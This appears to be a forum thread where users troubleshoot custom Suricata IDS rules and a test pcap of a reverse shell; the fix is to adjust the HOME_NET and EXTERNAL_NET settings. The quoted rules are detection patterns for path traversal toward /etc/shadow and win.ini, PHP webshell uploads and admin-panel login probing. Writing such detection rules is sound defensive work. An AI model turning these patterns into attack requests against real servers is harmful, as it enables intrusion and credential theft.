26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: archive hunter file not found"; flow: from_server,established; flowbits: isset, IDPS_ARCHIVE_HUNTER; content: !"20"; http_stat_code; offset: 0; depth: 2; flowbits: unset, IDPS_ARCHIVE_HUNTER; sid:3000152; rev:1; classtype: web-application-attack; metadata: created_at 2020_06_26, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: suspicious request to wp-content"; flow: to_server,established; content: "/wp-content/themes/sketch/"; nocase; http_uri; content: ".php"; nocase; http_uri; sid:3000285; rev:1; classtype: web-application-attack; metadata: created_at 2020_07_16, updated_at 2020_07_16, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: PHP file in /wp-content/uploads/"; flow: to_server,established; content: "|2f|wp|2d|content|2f|uploads|2f|"; distance: 0; within: 20; nocase; http_uri; content: ".php"; nocase; isdataat: !1, relative; http_uri; sid:3000410; rev:1; classtype: web-application-attack; metadata: created_at 2020_07_30, updated_at 2020_07_30, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert ftp $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: PHP file upload over FTP"; flow: established,to_server; dsize: >10; content: "STOR"; depth: 4; content: ".php|0d 0a|"; distance: 0; pcre: "/^STOR\s+[^\r\n]+?\x2ephp\r?$/m"; sid:3000417; rev:1; classtype: web-application-attack; metadata: created_at 2020_07_30, updated_at 2020_07_30, affected_product Web_Server_Applications, attack_target Server; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert ftp $HOME_NET any -> $EXTERNAL_NET any (msg:"IDPS: FTP login failed"; flow: from_server,established; content: "530 "; depth: 4; pcre: "/^530\s+(Login|User)/smi"; sid:3000437; rev:1; classtype: web-application-attack; metadata: created_at 2020_07_31, updated_at 2020_07_31, affected_product Linux, attack_target Server; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Possible path traversal detected in URI v2"; flow: to_server,established; priority: 2; flowbits: isnotset, IDPS_SYSTRAV; content: "..%2F..%2F..%2F"; http_raw_uri; sid:3000438; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: system file requested in traversal (encoded)"; flow: to_server,established; content: "..%2F..%2F"; http_raw_uri; pcre: "/etc\/shadow|win\.ini|boot\.ini/Ui"; flowbits: isnotset, IDPS_SYSTRAV; flowbits: set, IDPS_SYSTRAV; sid:3000459; rev:1; classtype: web-application-attack; metadata: created_at 2020_02_13, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: PHP file requested"; flow: to_server,established; content: ".php"; nocase; http_uri; content: !"index.php"; nocase; http_uri; flowbits: isnotset, IDPS_PHP_RECON; flowbits: set, IDPS_PHP_RECON; flowbits: noalert; sid:3173967; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_08, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: PHP file not found"; flow: from_server,established; flowbits: isset, IDPS_PHP_RECON; content: !"20"; http_stat_code; offset: 0; depth: 2; content: !"30"; http_stat_code; offset: 0; depth: 2; content: !"400"; http_stat_code; offset: 0; depth: 3; flowbits: unset, IDPS_PHP_RECON; sid:3173968; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_08, updated_at 2020_06_26, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: system file requested in traversal"; flow: to_server,established; content: "../../"; http_raw_uri; pcre: "/etc\/shadow|win\.ini|boot\.ini/Ui"; flowbits: isnotset, IDPS_SYSTRAV; flowbits: set, IDPS_SYSTRAV; sid:3174047; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_17, updated_at 2020_02_13, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "index.php"; nocase; http_uri; content: "pma_username|3d|"; http_client_body; content: "pma_password|3d|"; http_client_body; flowbits: isnotset, IDPS_PMA_LOGIN; flowbits: set, IDPS_PMA_LOGIN; flowbits: noalert; sid:3174048; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_17, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin login success"; flow: from_server,established; flowbits: isset, IDPS_PMA_LOGIN; content: "302"; http_stat_code; content: "Set-Cookie|3a| "; flowbits: unset, IDPS_PMA_LOGIN; sid:3174049; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_17, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin login failed"; flow: from_server,established; flowbits: isset, IDPS_PMA_LOGIN; content: !"302"; http_stat_code; flowbits: unset, IDPS_PMA_LOGIN; sid:3174050; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_17, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: Opencart login attempt (noalert)"; flow: to_server,established; content: "POST"; http_method; content: "/admin/"; nocase; http_uri; content: "Content-Type|3a 20|multipart/form-data|3b 20|boundary="; http_header; content: "username"; http_client_body; content: "password"; http_client_body; flowbits: isnotset, IDPS_OCART_LOGIN; flowbits: set, IDPS_OCART_LOGIN; flowbits: noalert; sid:3174101; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_24, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Opencart login failed"; flow: from_server,established; flowbits: isset, IDPS_OCART_LOGIN; content: !"302"; http_stat_code; flowbits: unset, IDPS_OCART_LOGIN; sid:3174102; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_24, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: Opencart login success"; flow: from_server,established; flowbits: isset, IDPS_OCART_LOGIN; content: "302"; http_stat_code; content: "Set-Cookie|3a|"; flowbits: unset, IDPS_OCART_LOGIN; sid:3174103; rev:1; classtype: web-application-attack; metadata: created_at 2020_09_24, updated_at 2020_04_20, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin recon (noalert)"; flow: to_server,established; content: "/phpmyadmin"; http_uri; nocase; fast_pattern; flowbits: isnotset, IDPS_PMA_RECON; flowbits: set, IDPS_PMA_RECON; flowbits: noalert; sid:3174303; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_12, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: phpMyAdmin recon failed"; flow: from_server,established; flowbits: isset, IDPS_PMA_RECON; content: !"20"; http_stat_code; offset: 0; depth: 2; content: !"30"; http_stat_code; offset: 0; depth: 2; flowbits: unset, IDPS_PMA_RECON; sid:3174304; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_12, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: phpMyAdmin pma recon (noalert)"; flow: to_server,established; content: "/pma"; http_uri; nocase; fast_pattern; flowbits: isnotset, IDPS_PMA_RECON; flowbits: set, IDPS_PMA_RECON; flowbits: noalert; sid:3174305; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_12, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: PHP file upload attempt"; flow: to_server,established; content: "POST"; http_method; content: "Content-Type|3a 20|multipart/form-data|3b 20|boundary="; http_header; content: "filename="; http_client_body; pcre: "/\.php.?['\"]\v/PRi"; sid:3174421; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_20, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: open directory response"; flow: from_server,established; content: "<title>Index of /"; nocase; threshold: type limit, track by_dst, seconds 10, count 1; sid:3174422; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_20, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: base64 encoded PHP tags"; flow: established,to_server; content: "PD9waHAg"; sid:3174423; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_20, updated_at 2020_09_17, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "drop http !$HOME_NET any -> $HTTP_SERVERS any (msg:"IDPS: IP address in Host header"; flow: established,to_server; content: "."; http_host;offset: 1;depth: 3; content: "."; http_host;within: 4; content: "."; http_host;within: 4; pcre: "/^(?:\d{1,3}\.){3}\d{1,3}$/W"; flowbits: isnotset, IDPS_IP_HOST; flowbits: set, IDPS_IP_HOST; sid:3174437; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_21, updated_at 2020_09_16, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: request to dotfile"; flow: to_server,established; content: "/."; http_raw_uri; pcre: !"/\//IR"; flowbits: isnotset, IDPS_DOTFILE; flowbits: set, IDPS_DOTFILE; sid:3178842; rev:1; classtype: web-application-attack; metadata: created_at 2021_02_05, updated_at 2021_02_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"IDPS: burp suite activity in Host header"; flow: established,to_server; content: "burpcollaborator.net"; http_host; sid:3178843; rev:1; classtype: web-application-attack; metadata: created_at 2021_02_05, updated_at 2021_02_05, affected_product Web_Server_Applications; )"
26/8/2021 -- 12:26:31 - <Warning> -- Failed to parse: "alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"IDPS: dotfile not found"; flow: from_server,established; flowbits: isset, IDPS_DOTFILE; content: !"20"; http_stat_code; offset: 0; depth: 2; flowbits: unset, IDPS_DOTFILE; sid:3178909; rev:1; classtype: web-application-attack; metadata: created_at 2021_02_08, updated_at 2021_02_05, affected_product Web_Server_Applications; )"

Yes, because it is not a TLS event, just a connection to my netcat listener on port 443.

I am not sure what suricata-update does with that file that makes it fail. I tested it the following way:

suricata -k none -v -c suricata.yaml -S idps_rules.txt -r reverse_shell_tls.pcap -l /tmp/log/

This needs to have your test IP in $HOME_NET in suricata.yaml for rules to trigger.

And this is weird because I don’t know where I got that 2610004 rule from, it just seems to be in my /etc/suricata/rules/suricata.rules file. Checked other distros I have suricata on, and none of them has this file. Weird.

I tried exactly as you did and I did not get any alert.

Don’t know why it does not work.
I have Suricata out of the box, only configured the interfaces to listen on and updated the rulesets.

Output below:

root@ubuntu:/etc/suricata/rules# suricata -k none -v -c ../suricata.yaml -S idps.txt -r /home/ubuntu/Downloads/reverse_shell_tls.pcap
26/8/2021 -- 13:49:28 - <Notice> - This is Suricata version 6.0.3 RELEASE running in USER mode
26/8/2021 -- 13:49:28 - <Info> - CPUs/cores online: 2
26/8/2021 -- 13:49:28 - <Info> - fast output device (regular) initialized: fast.log
26/8/2021 -- 13:49:28 - <Info> - eve-log output device (regular) initialized: eve.json
26/8/2021 -- 13:49:28 - <Info> - stats output device (regular) initialized: stats.log
26/8/2021 -- 13:49:28 - <Info> - 1 rule files processed. 65 rules successfully loaded, 0 rules failed
26/8/2021 -- 13:49:28 - <Info> - Threshold config parsed: 0 rule(s) found
26/8/2021 -- 13:49:28 - <Info> - 65 signatures processed. 0 are IP-only rules, 17 are inspecting packet payload, 48 inspect application layer, 0 are decoder event only
26/8/2021 -- 13:49:28 - <Notice> - all 3 packet processing threads, 4 management threads initialized, engine started.
26/8/2021 -- 13:49:28 - <Info> - Starting file run for /home/ubuntu/Downloads/reverse_shell_tls.pcap
26/8/2021 -- 13:49:28 - <Info> - pcap file /home/ubuntu/Downloads/reverse_shell_tls.pcap end of file reached (pcap err code 0)
26/8/2021 -- 13:49:28 - <Notice> - Signal Received.  Stopping engine.
26/8/2021 -- 13:49:28 - <Info> - time elapsed 0.085s
26/8/2021 -- 13:49:28 - <Notice> - Pcap-file module read 1 files, 24 packets, 2502 bytes
26/8/2021 -- 13:49:28 - <Info> - Alerts: 0
26/8/2021 -- 13:49:28 - <Info> - cleaning up signature grouping structure... complete

Did you change the $HOME_NET variable in suricata.yaml to the IP address of the server in the pcap file? That is all that's required to get those rules to match something in pcap mode. If that doesn't work, try 'any' as the HOME_NET variable value. Sadly Suricata is far from trivial to operate, but once you get there it's worth it.

Hi @h0llym0lly !

TLS detection is done on 443 by Suricata as it is a standard port for this proto (and a few other checks are also performed). The sni in your TLS event indicates that this is an event corresponding to a request being made to ubuntu.tests.com. Are you or a process on your system making this request? I feel that there is a lot of elaborate info in this event for this to not be an actual tls event. e.g. the TLS version, JA3 hash which is only extracted/calculated from a TLS packet header. Are you sure there is no other traffic on this port?
Please let me know if you have a strong reason to believe it is still a misdetection.

About detecting the traffic you want to, you can do a live capture on the interface or port with Wireshark or tcpdump. Look for the outliers (the packets you expect are weird and should alert) and create a rule based on the information in those packets.

Yes I did. That's my $HOME_NET config:

HOME_NET: "[192.168.184.0/24,10.4.4.0/24]"

So I attacked 192.168.184.130 from 192.168.184.132.
According to your answer it should work, as only $HOME_NET and the interface settings need to be changed.
But unfortunately it does not :(.
I need to fix this until Monday, but can't figure out why it won't work.

Can't set "any" in $HOME_NET:

26/8/2021 -- 15:01:21 - <Notice> - This is Suricata version 6.0.3 RELEASE running in USER mode
26/8/2021 -- 15:01:21 - <Info> - CPUs/cores online: 2
26/8/2021 -- 15:01:22 - <Error> - [ERRCODE: SC_ERR_INVALID_YAML_CONF_ENTRY(139)] - address var - "EXTERNAL_NET" has the complete IP space negated with its value "!$HOME_NET".  Rule address range is NIL. Probably have a !any or an address range that supplies a NULL address range
26/8/2021 -- 15:01:22 - <Error> - [ERRCODE: SC_ERR_INVALID_YAML_CONF_ENTRY(139)] - basic address vars test failed. Please check suricata.yaml for errors

I know why it doesn’t work. You have $HOME_NET as two networks defined - 192.168.184.0/24,10.4.4.0/24 and $EXTERNAL_NET as !$HOME_NET which means any machine not in your $HOME_NET. If we look at the rule we are trying to trigger it has ‘alert http $EXTERNAL_NET any → $HTTP_SERVERS’ which means it will only trigger coming not from your $HOME_NET to your $HOME_NET. But traffic in your pcap file is between servers in your $HOME_NET machines .132 to .130. Basically it means these rules trigger coming from the internet to your home network, not between home network machines. Either change HOME_NET, EXTERNAL_NET accordingly or edit rules to trigger between local machines. Best of luck!

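The variable resolution described in the reply above, modelled as an added Python example (not Suricata's own code): it uses the poster's HOME_NET together with the default suricata.yaml definitions EXTERNAL_NET: "!$HOME_NET" and HTTP_SERVERS: "$HOME_NET", shows why the original $EXTERNAL_NET -> $HTTP_SERVERS rule cannot match the .132 -> .130 flow in the pcap, and why HOME_NET: any leaves EXTERNAL_NET with an empty address range. The resolver is a simplified model that assumes flat, comma-separated address lists.

```python
import ipaddress

# Constructed from the thread: the poster's HOME_NET plus Suricata's default
# EXTERNAL_NET and HTTP_SERVERS definitions from suricata.yaml.
ADDRESS_VARS = {
    "HOME_NET": "[192.168.184.0/24,10.4.4.0/24]",
    "EXTERNAL_NET": "!$HOME_NET",
    "HTTP_SERVERS": "$HOME_NET",
}

ANY = ipaddress.ip_network("0.0.0.0/0")


def resolve(expr, vars_=ADDRESS_VARS):
    """Return (include, exclude) network lists for one address expression.
    Handles 'any', [a,b] lists, '!' negation and $VAR references (recursively).
    Simplified model: nested bracket groups are not supported."""
    include, exclude = [], []
    for tok in expr.strip("[]").split(","):
        tok = tok.strip()
        neg = tok.startswith("!")
        tok = tok.lstrip("!")
        if tok.startswith("$"):
            inc, exc = resolve(vars_[tok[1:]], vars_)
            # Negating a variable swaps what it includes and what it excludes.
            include += exc if neg else inc
            exclude += inc if neg else exc
            continue
        net = ANY if tok == "any" else ipaddress.ip_network(tok, strict=False)
        (exclude if neg else include).append(net)
    if not include:  # a purely negated expression means "everything except ..."
        include = [ANY]
    return include, exclude


def matches(expr, ip, vars_=ADDRESS_VARS):
    """True if ip is inside the expression's included nets and outside the excluded ones."""
    include, exclude = resolve(expr, vars_)
    addr = ipaddress.ip_address(ip)
    return any(addr in n for n in include) and not any(addr in n for n in exclude)


def rule_applies(src_expr, dst_expr, src_ip, dst_ip):
    """Address part of a rule header only: both source and destination must match."""
    return matches(src_expr, src_ip) and matches(dst_expr, dst_ip)


def external_net_is_nil(home_net):
    """Reproduce the SC_ERR_INVALID_YAML_CONF_ENTRY condition from the thread:
    with HOME_NET 'any', EXTERNAL_NET = !$HOME_NET negates the whole address space."""
    _, exclude = resolve("!$HOME_NET", {"HOME_NET": home_net})
    return ANY in exclude
```

With the original header the .132 source is excluded by !$HOME_NET, so the rule never evaluates its content matches; switching the source to $HOME_NET (as done later in the thread) or widening HOME_NET/EXTERNAL_NET restores the match.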

Still does not work. I was changing EXTERNAL_NET to "any" and to "$HOME_NET" (without the exclamation mark).
Changed rule:

alert http $HOME_NET any -> $HTTP_SERVERS any (msg:"IDPS: base64 encoded PHP tags"; flow: established,to_server; content: "PD9waHAg"; sid:3174423; rev:1; classtype: web-application-attack; metadata: created_at 2020_10_20, updated_at 2020_09_17, affected_product Web_Server_Applications;)

Still no success.

27/8/2021 -- 10:18:00 - <Notice> - This is Suricata version 6.0.3 RELEASE running in USER mode
27/8/2021 -- 10:18:00 - <Info> - CPUs/cores online: 2
27/8/2021 -- 10:18:00 - <Info> - fast output device (regular) initialized: fast.log
27/8/2021 -- 10:18:00 - <Info> - eve-log output device (regular) initialized: eve.json
27/8/2021 -- 10:18:00 - <Info> - stats output device (regular) initialized: stats.log
27/8/2021 -- 10:18:00 - <Info> - 1 rule files processed. 65 rules successfully loaded, 0 rules failed
27/8/2021 -- 10:18:00 - <Info> - Threshold config parsed: 0 rule(s) found
27/8/2021 -- 10:18:00 - <Info> - 65 signatures processed. 0 are IP-only rules, 17 are inspecting packet payload, 48 inspect application layer, 0 are decoder event only
27/8/2021 -- 10:18:00 - <Notice> - all 3 packet processing threads, 4 management threads initialized, engine started.
27/8/2021 -- 10:18:00 - <Info> - Starting file run for /home/ubuntu/Downloads/reverse_shell_tls.pcap
27/8/2021 -- 10:18:00 - <Info> - pcap file /home/ubuntu/Downloads/reverse_shell_tls.pcap end of file reached (pcap err code 0)
27/8/2021 -- 10:18:00 - <Notice> - Signal Received.  Stopping engine.
27/8/2021 -- 10:18:00 - <Info> - time elapsed 0.047s
27/8/2021 -- 10:18:00 - <Notice> - Pcap-file module read 1 files, 24 packets, 2502 bytes
27/8/2021 -- 10:18:00 - <Info> - Alerts: 1
27/8/2021 -- 10:18:00 - <Info> - cleaning up signature grouping structure... complete


It's working, check the fast.log file.